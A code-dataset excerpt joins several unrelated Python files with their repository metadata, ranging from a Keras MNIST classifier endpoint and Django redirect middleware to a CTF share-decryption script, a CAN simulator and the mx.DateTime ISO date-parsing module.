] | null | null | null | Chapter05/mnist.py | PacktPublishing/Hands-On-Deep-Learning-for-Images-with-TensorFlow | 1ced05560a4fc8b444e8524b0c896d5aa00e2fc7 | [
"MIT"
] | 14 | 2018-09-18T22:38:27.000Z | 2021-03-16T21:11:27.000Z | """
This module serves as the API provider for MNIST digit processing.
"""
import io
import json
import numpy as np
from keras.models import load_model
from PIL import Image
from PIL.ImageOps import fit, grayscale
MNIST_MODEL = load_model('var/data/mnist.h5')
print(MNIST_MODEL.summary())
def post_image(file):
"""
Given a posted image, classify it using the pretrained model.
This will take 'any size' image, and scale it down to 28x28 like our MNIST
training data -- and convert to grayscale.
Parameters
----------
file:
Bytestring contents of the uploaded file. This will be in an image file format.
"""
#using Pillow -- python image processing -- to turn the poseted file into bytes
image = Image.open(io.BytesIO(file.read()))
image = grayscale(fit(image, (28, 28)))
image_bytes = image.tobytes()
#image needs to be a 'batch' though only of one, and with one channel -- grayscale
image_array = np.reshape(np.frombuffer(image_bytes, dtype=np.uint8), (1, 28, 28, 1))
prediction = MNIST_MODEL.predict(image_array)
#argmax to reverse the one hot encoding
digit = np.argmax(prediction[0])
#need to convert to int -- numpy.int64 isn't known to serialize
return json.dumps({'digit': int(digit)})
| 32.923077 | 89 | 0.698598 | 193 | 1,284 | 4.595855 | 0.533679 | 0.033822 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018519 | 0.200935 | 1,284 | 38 | 90 | 33.789474 | 0.846004 | 0.482866 | 0 | 0 | 0 | 0 | 0.035831 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.375 | 0 | 0.5 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
bbe8258f0a5edf3dab38c8003822237f616cb41a | 628 | py | Python | dalme_app/utils/domain_middleware.py | DALME/dalme | 46f9a0011fdb75c5098b552104fc73b1062e16e9 | [
"BSD-3-Clause"
] | 6 | 2019-05-07T01:06:04.000Z | 2021-02-19T20:45:09.000Z | dalme_app/utils/domain_middleware.py | DALME/dalme | 46f9a0011fdb75c5098b552104fc73b1062e16e9 | [
"BSD-3-Clause"
] | 23 | 2018-09-14T18:01:42.000Z | 2021-12-29T17:25:18.000Z | dalme_app/utils/domain_middleware.py | DALME/dalme | 46f9a0011fdb75c5098b552104fc73b1062e16e9 | [
"BSD-3-Clause"
] | 1 | 2020-02-10T16:20:57.000Z | 2020-02-10T16:20:57.000Z | from django.http import HttpResponsePermanentRedirect
class SubdomainRedirectMiddleware:
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
host = request.get_host()
if host in ['www.dalme.org', 'public.dalme.org']:
return HttpResponsePermanentRedirect("https://dalme.org" + request.path)
elif host in ['www.127.0.0.1.sslip.io:8443', 'public.127.0.0.1.sslip.io:8443']:
return HttpResponsePermanentRedirect("https://127.0.0.1.sslip.io:8443" + request.path)
else:
return self.get_response(request)
| 39.25 | 98 | 0.673567 | 78 | 628 | 5.25641 | 0.410256 | 0.107317 | 0.109756 | 0.043902 | 0.12439 | 0.12439 | 0.12439 | 0 | 0 | 0 | 0 | 0.059761 | 0.200637 | 628 | 15 | 99 | 41.866667 | 0.756972 | 0 | 0 | 0 | 0 | 0 | 0.213376 | 0.090764 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bbee8286c1b16f23c2fbea4885c81a4ff32f0eaa | 3,149 | py | Python | decrypt_next_level.py | fishilico/sstic-2016 | 9a05bb18df4c8d2e76f1e30fda6b38b1bc930e8c | [
"Beerware"
] | null | null | null | decrypt_next_level.py | fishilico/sstic-2016 | 9a05bb18df4c8d2e76f1e30fda6b38b1bc930e8c | [
"Beerware"
] | null | null | null | decrypt_next_level.py | fishilico/sstic-2016 | 9a05bb18df4c8d2e76f1e30fda6b38b1bc930e8c | [
"Beerware"
] | 1 | 2020-04-03T06:19:11.000Z | 2020-04-03T06:19:11.000Z | #!/usr/bin/env python3
"""Decrypt the data needed for the next level"""
import base64
import binascii
import hashlib
import json
import numpy
import sys
from Crypto.Cipher import AES
# x^128 + x^7 + x^2 + x + 1
GCM_POLY = (1 << 128) + (1 << 7) + (1 << 2) + (1 << 1) + (1 << 0)
def invert_poly(p):
"""Invert the given polynomial in the GCM field"""
assert p > 0
assert p.bit_length() <= 128
e, f = GCM_POLY, p
l, m = 0, 1
# m, l so that m * p + l * GCM_POLY = 1
while f != 1:
j = f.bit_length() - e.bit_length()
if j < 0:
e, f = f, e
l, m = m, l
j = -j
f ^= e << j
m ^= l << j
return m
def multiply_poly(x, y):
"""Multiply two polynomials in the GCM field"""
assert x.bit_length() <= 128
assert y.bit_length() <= 128
result = 0
for bitpos in range(128):
if y & (1 << bitpos):
result ^= x
x = x << 1
if x.bit_length() > 128:
x ^= GCM_POLY
return result
# Sanity checks
assert multiply_poly(2, 1 << 127) == 0x87
assert invert_poly(1) == 1
assert invert_poly(2) == 0x80000000000000000000000000000043
assert multiply_poly(3, invert_poly(3)) == 1
if len(sys.argv) < 4:
print("Usage: {} path/to/next/data.json path/to/current/data.json path/to/passcode/1 ...".format(sys.argv[0]))
sys.exit(1)
with open(sys.argv[2]) as data_file:
jsondata = json.load(data_file)
ssspoints = []
for passcode_path in sys.argv[3:]:
# Read the code found after solving an enigma
with open(passcode_path, 'r') as pass_file:
passcode = binascii.unhexlify(pass_file.read().strip())
# Decrypt the encrypted shares
hpass = hashlib.sha256(passcode).hexdigest()
assert hpass in jsondata['shares'], "Invalid code!"
iv = binascii.unhexlify(jsondata['shares'][hpass]['iv'])
data = base64.b64decode(jsondata['shares'][hpass]['data'])
key = passcode
decrypted = AES.new(key, AES.MODE_CBC, iv).decrypt(data)
padlen = decrypted[-1]
assert all(x == padlen for x in decrypted[-padlen:])
decrypted = decrypted[:-padlen]
# Load the new points
for point in json.loads(decrypted.decode('ascii')):
# Convert y to a polynom
ssspoints.append((point['x'], int(point['y'], 16)))
# Interpolate the coefficients of "y = x^2 + a * x + b" curve
assert len(ssspoints) >= 2
x1, y1 = ssspoints[0]
x2, y2 = ssspoints[1]
y1 ^= multiply_poly(x1, x1)
y2 ^= multiply_poly(x2, x2)
coef_a = multiply_poly(y1 ^ y2, invert_poly(x1 ^ x2))
coef_b = y1 ^ multiply_poly(coef_a, x1)
for x, y in ssspoints:
assert y == multiply_poly(x, x) ^ multiply_poly(coef_a, x) ^ coef_b
# The key is the value of the curve at x=0
key = binascii.unhexlify(hex(coef_b)[2:])
# Decrypt data of next level
iv = binascii.unhexlify(jsondata['next_level']['iv'])
data = base64.b64decode(jsondata['next_level']['data'])
decrypted = AES.new(key, AES.MODE_CBC, iv).decrypt(data)
padlen = decrypted[-1]
assert all(x == padlen for x in decrypted[-padlen:])
decrypted = decrypted[:-padlen]
with open(sys.argv[1], 'wb') as next_file:
next_file.write(decrypted)
| 29.157407 | 114 | 0.62496 | 492 | 3,149 | 3.914634 | 0.272358 | 0.056075 | 0.024922 | 0.013499 | 0.172378 | 0.122534 | 0.122534 | 0.122534 | 0.122534 | 0.122534 | 0 | 0.055875 | 0.227056 | 3,149 | 107 | 115 | 29.429907 | 0.735415 | 0.150206 | 0 | 0.106667 | 0 | 0.013333 | 0.058113 | 0.017736 | 0 | 0 | 0.01434 | 0 | 0.173333 | 1 | 0.026667 | false | 0.12 | 0.093333 | 0 | 0.146667 | 0.013333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
bbef9d9515fa58cd4632952527de7c91bf724f99 | 6,930 | py | Python | src/priority_selector.py | moibenko/enstore | 6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9 | [
"Intel",
"Unlicense"
] | 4 | 2021-10-17T11:17:59.000Z | 2022-02-28T16:58:40.000Z | src/priority_selector.py | moibenko/enstore | 6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9 | [
"Intel",
"Unlicense"
] | 17 | 2021-10-05T21:44:06.000Z | 2022-03-31T16:58:40.000Z | src/priority_selector.py | moibenko/enstore | 6f2ff5b67ff73872a9e68f2a68b0bdaa70cef9b9 | [
"Intel",
"Unlicense"
] | 8 | 2021-09-02T18:55:49.000Z | 2022-03-09T21:05:28.000Z | #!/usr/bin/env python
###############################################################################
# $Id$
#
# system imports
import sys
import os
import stat
import errno
import string
import re
#import pcre has been deprecated
import copy
import traceback
import e_errors
import Trace
MAX_REG_PRIORITY = 1000001
class PriSelector:
def read_config(self):
Trace.log(e_errors.INFO, "(Re)loading priority")
self.exists = 0
dict=self.csc.get('priority',{})
if dict['status'][0] == e_errors.OK:
prioritydict=dict.get(self.library_manager, {})
else:
prioritydict = {}
if prioritydict:
self.exists = 1
self.prioritydict = prioritydict
self.base_dict = prioritydict.get('basepri',{})
self.adm_dict = prioritydict.get('adminpri',{})
self.base_pri_keys = self.base_dict.keys()
self.admin_pri_keys = self.adm_dict.keys()
self.base_pri_keys.sort()
self.base_pri_keys.reverse()
self.admin_pri_keys.sort()
self.admin_pri_keys.reverse()
return (e_errors.OK, None)
def __init__(self, csc, library_manager, max_reg_pri=MAX_REG_PRIORITY):
self.max_reg_pri = max_reg_pri
self.library_manager = library_manager
self.csc = csc
self.read_config()
def ticket_match(self, ticket, pri_key, conf_key):
pattern = "^%s" % (self.prioritydict[pri_key][conf_key],)
item='%s'%(ticket.get(conf_key, 'Unknown'),)
try:
if re.search(pattern, item): return 1
else: return 0
except:
Trace.log(e_errors.ERROR,"parse errorr")
Trace.handle_error()
return 0
#pcre is deprecated
#except pcre.error, detail:
# Trace.log(e_errors.ERROR,"parse errorr %s" % (detail, ))
# return 0
def priority(self, ticket):
#self.read_config()
if not self.exists: # no priority configuration info
return ticket['encp']['basepri'], ticket['encp']['adminpri']
# make a "flat" copy of ticket
# use deepcopy
flat_ticket=copy.deepcopy(ticket)
#flat_ticket.update(ticket)
# before making a ticket remove ['vc']['wrapper'] as it will interfere
# with 'wrapper' (see ticket structure)
if flat_ticket['vc'].has_key('wrapper'): del(flat_ticket['vc']['wrapper'])
for key in flat_ticket.keys():
if type(flat_ticket[key]) is type({}):
for k in flat_ticket[key].keys():
if k == 'machine': flat_ticket['host'] = flat_ticket[key][k][1]
else: flat_ticket[k] = flat_ticket[key][k]
del(flat_ticket[key])
cur_pri = flat_ticket['basepri']
cur_adm_pri = flat_ticket.get('adminpri',-1)
daq_enabled = flat_ticket.get('encp_daq',None)
# regular priority
self.prioritydict = self.base_dict
pri_keys = self.base_pri_keys
for pri_key in pri_keys:
conf_keys = self.prioritydict[pri_key].keys()
nkeys = len(conf_keys)
nmatches = 0
for conf_key in conf_keys:
# try to match a ticket
if not self.ticket_match(flat_ticket, pri_key, conf_key): break
nmatches = nmatches + 1
if nmatches == nkeys:
if (pri_key <= self.max_reg_pri):
if pri_key+cur_pri <= self.max_reg_pri:
cur_pri = pri_key+cur_pri
else:
cur_pri = pri_key+cur_pri
break
# admin priority
self.prioritydict = self.adm_dict
pri_keys = self.admin_pri_keys
for pri_key in pri_keys:
conf_keys = self.prioritydict[pri_key].keys()
nkeys = len(conf_keys)
nmatches = 0
for conf_key in conf_keys:
# try to match a ticket
if not self.ticket_match(flat_ticket, pri_key, conf_key): break
nmatches = nmatches + 1
if nmatches == nkeys:
if (pri_key <= self.max_reg_pri):
if pri_key+cur_adm_pri <= self.max_reg_pri:
cur_adm_pri = pri_key+cur_adm_pri
else:
cur_adm_pri = pri_key+cur_adm_pri
break
if cur_pri >= self.max_reg_pri:
if daq_enabled:
cur_adm_pri = cur_pri / self.max_reg_pri + cur_adm_pri
cur_pri = self.max_reg_pri
return cur_pri, cur_adm_pri
if __name__ == "__main__":
import configuration_client
def_addr = (os.environ['ENSTORE_CONFIG_HOST'],
string.atoi(os.environ['ENSTORE_CONFIG_PORT']))
csc = configuration_client.ConfigurationClient( def_addr )
ps = PriSelector(csc, 'mam.library_manager')
#ps.read_config()
ticket={'unique_id': 'happy.fnal.gov-959786955.526691-14962', 'at_the_top': 2,
'encp': {'delayed_dismount': 1, 'basepri': 1, 'adminpri': -1, 'curpri': 1,
'agetime': 0, 'delpri': 0}, 'fc': {'address': ('131.225.84.122', 7501),
'size': 5158L,
'external_label': 'null02'},
'vc': {'library': 'happynull', 'file_family_width':2,
'volume_family': 'D0.alex.null', 'address': ('131.225.84.122', 7502),
'wrapper': 'null', 'file_family': 'alex.null',
'at_mover': ('unmounted', 'none'), 'storage_group': 'D0'},
'times': {'t0': 959786955.184, 'in_queue': 2.62227797508,
'job_queued': 959786955.542, 'lm_dequeued': 959786958.164},
'wrapper': {'minor': 0, 'inode': 0,
'fullname': '/home/moibenko/enstore2/src/alarm.py',
'size_bytes': 5158L, 'gname': 'hppc', 'mode': 33261,
'gid': 5440, 'mtime': 959786955, 'sanity_size': 65536,
'machine': ('Linux',
'happy.fnal.gov',
'2.2.15',
'#4 SMP Tue May 30 13:35:20 CDT 2000', 'i686'),
'uname': 'moibenko',
'pstat': (16893, 70397816L,3, 1, 6849, 5440, 512L, 959704674, 959704674, 959704674),
'uid': 6849, 'pnfsFilename': '/pnfs/rip6/happy/NULL/d2/alarm_client.py',
'rminor': 0, 'rmajor': 0, 'type': 'null', 'major': 0},
'lm': {'address': ('131.225.84.122', 7503)}, 'callback_addr': ('131.225.84.122', 7600),
'work': 'write_to_hsm', 'retry': 2, 'status': ('ok', None)}
pri, adm_pri = ps.priority(ticket)
print "END"
print "Priority:",pri, adm_pri
| 41.005917 | 108 | 0.534921 | 817 | 6,930 | 4.305998 | 0.29131 | 0.048323 | 0.025583 | 0.029562 | 0.253269 | 0.204377 | 0.189596 | 0.166572 | 0.14838 | 0.132462 | 0 | 0.06003 | 0.331746 | 6,930 | 168 | 109 | 41.25 | 0.699633 | 0.072727 | 0 | 0.204545 | 0 | 0 | 0.144957 | 0.017863 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0.015152 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bbfc6b7501f68090857b839fbaec0575500721e9 | 1,387 | py | Python | main.py | BateauNautilus/drivesimulator | 290382f9c196a0daeca7a45a9abb792d1a035c8c | [
"MIT"
] | 1 | 2015-10-08T04:03:58.000Z | 2015-10-08T04:03:58.000Z | main.py | BateauNautilus/drivesimulator | 290382f9c196a0daeca7a45a9abb792d1a035c8c | [
"MIT"
] | null | null | null | main.py | BateauNautilus/drivesimulator | 290382f9c196a0daeca7a45a9abb792d1a035c8c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import time
from Message.CANMessage import MessageToCan
from Message.EnvironmentStatus import EnvironmentStatus
from Message.MotorStatus import MotorStatus
from Message.Parameters.Current import Current
from Message.Parameters.Humidity import Humidity
from Message.Parameters.Vibration import Vibration
from Message.Parameters.Voltage import Voltage
from Message.Parameters.WaterTemperature import WaterTemperature
from config import Config
from lib.pythoncan import can
from Message.Parameters.RPM import Rpm
tasks = {}
def main():
bus = can.interface.Bus(channel=Config.getChannel(), bustype=Config.getBusType())
print('start_transmit()')
sendMotorStatusMessage()
sendEnvironmentStatusMessage()
while True:
time.sleep(20)
def sendMotorStatusMessage():
msg = MotorStatus(rpm=Rpm(5000), voltage=Voltage(12.5), current=Current(2), vibration=Vibration(0.2))
canmsg = MessageToCan(msg, deviceId=Config.getDeviceId())
tasks['motorStatus'] = can.send_periodic(Config.getChannel(), canmsg, msg.period)
def sendEnvironmentStatusMessage():
msg = EnvironmentStatus(waterTemperature=WaterTemperature(5), humidity=Humidity(0.12))
canmsg = MessageToCan(msg, deviceId=Config.getDeviceId())
tasks['EnvironmentStatus'] = can.send_periodic(Config.getChannel(), canmsg, msg.period)
if __name__ == "__main__":
main() | 33.829268 | 105 | 0.777938 | 154 | 1,387 | 6.935065 | 0.357143 | 0.092697 | 0.117978 | 0.054307 | 0.181648 | 0.181648 | 0.181648 | 0.086142 | 0 | 0 | 0 | 0.013912 | 0.118962 | 1,387 | 41 | 106 | 33.829268 | 0.860065 | 0.015141 | 0 | 0.066667 | 0 | 0 | 0.038067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.5 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
a51fa64bf6e06d03d20294775fe60521fe1d38d5 | 1,187 | py | Python | src/pyscaffoldext/nox/extension.py | SarthakJariwala/pyscaffoldext-nox | 7bb84218facaf8a8c03bad307abcbadd1f5a3459 | [
"MIT"
] | null | null | null | src/pyscaffoldext/nox/extension.py | SarthakJariwala/pyscaffoldext-nox | 7bb84218facaf8a8c03bad307abcbadd1f5a3459 | [
"MIT"
] | null | null | null | src/pyscaffoldext/nox/extension.py | SarthakJariwala/pyscaffoldext-nox | 7bb84218facaf8a8c03bad307abcbadd1f5a3459 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Implementation to add noxfile.py to
PyScaffold project
"""
from pathlib import PurePath
from pyscaffold.api import Extension, helpers
from .templates import noxfile
class Nox(Extension):
"""
Generate Nox configuration file for PyScaffold
"""
def activate(self, actions):
"""Activate extension
Args:
actions (list): list of actions to perform
Returns:
list: updated list of actions
"""
actions = self.register(actions, self.add_noxfile, after="define_structure")
return actions
def add_noxfile(self, struct, opts):
"""Add a noxfile.py file
Args:
struct (dict): project representation as (possibly) nested
:obj:`dict`.
opts (dict): given options, see :obj:`create_project` for
an extensive list.
Returns:
struct, opts: updated project representation and options
"""
files = PurePath(opts["project"], "noxfile.py")
content = noxfile(opts)
struct = helpers.ensure(struct, files, content, helpers.NO_OVERWRITE)
return struct, opts
| 26.377778 | 84 | 0.611626 | 128 | 1,187 | 5.632813 | 0.46875 | 0.041609 | 0.036061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001193 | 0.294019 | 1,187 | 44 | 85 | 26.977273 | 0.859189 | 0.433024 | 0 | 0 | 0 | 0 | 0.061682 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.25 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
a5213db851bfc1609188f26a356155fd3f1f97df | 379 | py | Python | src/app/utils/string.py | meyer-net/robot | e35cf6d5a4293eaf7330a733f3e6f35f4789623c | [
"MIT"
] | 12 | 2018-07-31T02:47:42.000Z | 2019-04-29T05:40:46.000Z | src/app/utils/string.py | meyer-net/pyflink-framework.osteam.base | e35cf6d5a4293eaf7330a733f3e6f35f4789623c | [
"MIT"
] | null | null | null | src/app/utils/string.py | meyer-net/pyflink-framework.osteam.base | e35cf6d5a4293eaf7330a733f3e6f35f4789623c | [
"MIT"
] | 1 | 2020-04-22T08:53:46.000Z | 2020-04-22T08:53:46.000Z | # -- coding: UTF-8
class String(object):
def __init__(self):
super(String, self).__init__()
'''
类名标准化
'''
def class_name_normalize(self, class_name):
part_list = []
for item in class_name.split("_"):
part_list.append("{}{}".format(item[0].upper(), item[1:].lower()))
return "".join(part_list) | 25.266667 | 78 | 0.530343 | 43 | 379 | 4.302326 | 0.627907 | 0.145946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011278 | 0.298153 | 379 | 15 | 79 | 25.266667 | 0.684211 | 0.042216 | 0 | 0 | 0 | 0 | 0.014663 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a53297a29f41369c2fc2a2e92bcadad2a1cd0faf | 9,966 | py | Python | build/lib.linux-x86_64-2.7_ucs4/mx/DateTime/ISO.py | mkubux/egenix-mx-base | 3e6f9186334d9d73743b0219ae857564c7208247 | [
"eGenix"
] | null | null | null | build/lib.linux-x86_64-2.7_ucs4/mx/DateTime/ISO.py | mkubux/egenix-mx-base | 3e6f9186334d9d73743b0219ae857564c7208247 | [
"eGenix"
] | null | null | null | build/lib.linux-x86_64-2.7_ucs4/mx/DateTime/ISO.py | mkubux/egenix-mx-base | 3e6f9186334d9d73743b0219ae857564c7208247 | [
"eGenix"
] | null | null | null | """ This module provides a set of constructors and routines to convert
between DateTime[Delta] instances and ISO representations of date
and time.
Note: Timezones are only interpreted by ParseDateTimeGMT(). All
other constructors silently ignore the time zone information.
Copyright (c) 1998-2000, Marc-Andre Lemburg; mailto:mal@lemburg.com
Copyright (c) 2000-2015, eGenix.com Software GmbH; mailto:info@egenix.com
See the documentation for further information on copyrights,
or contact the author.
"""
import DateTime,Timezone
import re
# Grammar: ISO 8601 (not all, but what we need from it)
_year = '(?P<year>\d?\d\d\d)'
_month = '(?P<month>\d?\d)'
_day = '(?P<day>\d?\d)'
_hour = '(?P<hour>\d?\d)'
_minute = '(?P<minute>\d?\d)'
_second = '(?P<second>\d?\d(?:\.\d+)?)'
_sign = '(?P<sign>[-+])'
_week = 'W(?P<week>\d?\d)'
_zone = Timezone.isozone
_weekdate = _year + '-?(?:' + _week + '-?' + _day + '?)?'
_date = _year + '-?' + '(?:' + _month + '-?' + _day + '?)?'
_time = _hour + ':?' + _minute + ':?' + _second + '?(?:' + _zone + ')?'
isodatetimeRE = re.compile(_date + '(?:[ T]' + _time + ')?$')
isodateRE = re.compile(_date + '$')
isotimeRE = re.compile(_time + '$')
isodeltaRE = re.compile(_sign + '?' + _time + '$')
isoweekRE = re.compile(_weekdate + '$')
isoweektimeRE = re.compile(_weekdate + '(?:[ T]' + _time + ')?$')
def WeekTime(year,isoweek=1,isoday=1,hour=0,minute=0,second=0.0):
""" Week(year,isoweek=1,isoday=1,hour=0,minute=0,second=0.0)
Returns a DateTime instance pointing to the given ISO week and
day. isoday defaults to 1, which corresponds to Monday in the
ISO numbering. The time part is set as given.
"""
d = DateTime.DateTime(year,1,1,hour,minute,second)
if d.iso_week[0] == year:
# 1.1. belongs to year (backup to Monday)
return d + (-d.day_of_week + 7 * (isoweek-1) + isoday-1)
else:
# 1.1. belongs to year-1 (advance to next Monday)
return d + (7-d.day_of_week + 7 * (isoweek-1) + isoday-1)
# Alias
Week = WeekTime
# Aliases for the other constructors (they all happen to already use
# ISO format)
Date = DateTime.Date
Time = DateTime.Time
TimeDelta = DateTime.TimeDelta
def ParseDateTime(isostring,parse_isodatetime=isodatetimeRE.match):
""" ParseDateTime(isostring)
Returns a DateTime instance reflecting the given ISO date. A
time part is optional and must be delimited from the date by a
space or 'T'.
Time zone information is parsed, but not evaluated.
"""
s = isostring.strip()
date = parse_isodatetime(s)
if not date:
raise ValueError,'wrong format, use YYYY-MM-DD HH:MM:SS'
year,month,day,hour,minute,second,zone = date.groups()
year = int(year)
if month is None:
month = 1
else:
month = int(month)
if day is None:
day = 1
else:
day = int(day)
if hour is None:
hour = 0
else:
hour = int(hour)
if minute is None:
minute = 0
else:
minute = int(minute)
if second is None:
second = 0.0
else:
second = float(second)
return DateTime.DateTime(year,month,day,hour,minute,second)
def ParseDateTimeGMT(isostring,parse_isodatetime=isodatetimeRE.match):
""" ParseDateTimeGMT(isostring)
Returns a DateTime instance in UTC reflecting the given ISO
date. A time part is optional and must be delimited from the
date by a space or 'T'. Timezones are honored.
"""
s = isostring.strip()
date = parse_isodatetime(s)
if not date:
raise ValueError,'wrong format, use YYYY-MM-DD HH:MM:SS'
year,month,day,hour,minute,second,zone = date.groups()
year = int(year)
if month is None:
month = 1
else:
month = int(month)
if day is None:
day = 1
else:
day = int(day)
if hour is None:
hour = 0
else:
hour = int(hour)
if minute is None:
minute = 0
else:
minute = int(minute)
if second is None:
second = 0.0
else:
second = float(second)
offset = Timezone.utc_offset(zone)
return DateTime.DateTime(year,month,day,hour,minute,second) - offset
# Alias
ParseDateTimeUTC = ParseDateTimeGMT
def ParseDate(isostring,parse_isodate=isodateRE.match):
""" ParseDate(isostring)
Returns a DateTime instance reflecting the given ISO date. A
time part may not be included.
"""
s = isostring.strip()
date = parse_isodate(s)
if not date:
raise ValueError,'wrong format, use YYYY-MM-DD'
year,month,day = date.groups()
year = int(year)
if month is None:
month = 1
else:
month = int(month)
if day is None:
day = 1
else:
day = int(day)
return DateTime.DateTime(year,month,day)
def ParseWeek(isostring,parse_isoweek=isoweekRE.match):
""" ParseWeek(isostring)
Returns a DateTime instance reflecting the given ISO date. A
time part may not be included.
"""
s = isostring.strip()
date = parse_isoweek(s)
if not date:
raise ValueError,'wrong format, use yyyy-Www-d, e.g. 1998-W01-1'
year,week,day = date.groups()
year = int(year)
if week is None:
week = 1
else:
week = int(week)
if day is None:
day = 1
else:
day = int(day)
return Week(year,week,day)
def ParseWeekTime(isostring,parse_isoweektime=isoweektimeRE.match):
""" ParseWeekTime(isostring)
Returns a DateTime instance reflecting the given ISO date. A
time part is optional and must be delimited from the date by a
space or 'T'.
"""
s = isostring.strip()
date = parse_isoweektime(s)
if not date:
raise ValueError,'wrong format, use e.g. "1998-W01-1 12:00:30"'
year,week,day,hour,minute,second,zone = date.groups()
year = int(year)
if week is None:
week = 1
else:
week = int(week)
if day is None:
day = 1
else:
day = int(day)
if hour is None:
hour = 0
else:
hour = int(hour)
if minute is None:
minute = 0
else:
minute = int(minute)
if second is None:
second = 0.0
else:
second = float(second)
return WeekTime(year,week,day,hour,minute,second)
def ParseTime(isostring,parse_isotime=isotimeRE.match):
""" ParseTime(isostring)
Returns a DateTimeDelta instance reflecting the given ISO time.
Hours and minutes must be given, seconds are
optional. Fractions of a second may also be used,
e.g. 12:23:12.34.
"""
s = isostring.strip()
time = parse_isotime(s)
if not time:
raise ValueError,'wrong format, use HH:MM:SS'
hour,minute,second,zone = time.groups()
hour = int(hour)
minute = int(minute)
if second is not None:
second = float(second)
else:
second = 0.0
return DateTime.TimeDelta(hour,minute,second)
def ParseTimeDelta(isostring,parse_isodelta=isodeltaRE.match):
""" ParseTimeDelta(isostring)
Returns a DateTimeDelta instance reflecting the given ISO time
as delta. Hours and minutes must be given, seconds are
optional. Fractions of a second may also be used,
e.g. 12:23:12.34. In addition to the ISO standard a sign may be
prepended to the time, e.g. -12:34.
"""
s = isostring.strip()
time = parse_isodelta(s)
if not time:
raise ValueError,'wrong format, use [-]HH:MM:SS'
sign,hour,minute,second,zone = time.groups()
hour = int(hour)
minute = int(minute)
if second is not None:
second = float(second)
else:
second = 0.0
if sign and sign == '-':
return -DateTime.TimeDelta(hour,minute,second)
else:
return DateTime.TimeDelta(hour,minute,second)
def ParseAny(isostring):
""" ParseAny(isostring)
Parses the given string and tries to convert it to a
DateTime[Delta] instance.
"""
try:
return ParseDateTime(isostring)
except ValueError:
pass
try:
return ParseWeekTime(isostring)
except ValueError:
pass
try:
return ParseTimeDelta(isostring)
except ValueError:
raise ValueError,'unsupported format: "%s"' % isostring
def str(datetime,tz=None):
""" str(datetime,tz=DateTime.tz_offset(datetime))
Returns the datetime instance as ISO date string. tz can be
given as DateTimeDelta instance providing the time zone
difference from datetime's zone to UTC. It defaults to
DateTime.tz_offset(datetime) which assumes local time.
"""
if tz is None:
tz = datetime.gmtoffset()
return '%04i-%02i-%02i %02i:%02i:%02i%+03i%02i' % (
datetime.year, datetime.month, datetime.day,
datetime.hour, datetime.minute, datetime.second,
tz.hour,tz.minute)
def strGMT(datetime):
""" strGMT(datetime)
Returns the datetime instance as ISO date string assuming it is
given in GMT.
"""
return '%04i-%02i-%02i %02i:%02i:%02i+0000' % (
datetime.year, datetime.month, datetime.day,
datetime.hour, datetime.minute, datetime.second)
def strUTC(datetime):
""" strUTC(datetime)
Returns the datetime instance as ISO date string assuming it is
given in UTC.
"""
return '%04i-%02i-%02i %02i:%02i:%02i+0000' % (
datetime.year, datetime.month, datetime.day,
datetime.hour, datetime.minute, datetime.second)
# Testing
if __name__ == '__main__':
e = DateTime.Date(1900,1,1)
for i in range(100000):
d = e + i
year,week,day = d.iso_week
c = WeekTime(year,week,day)
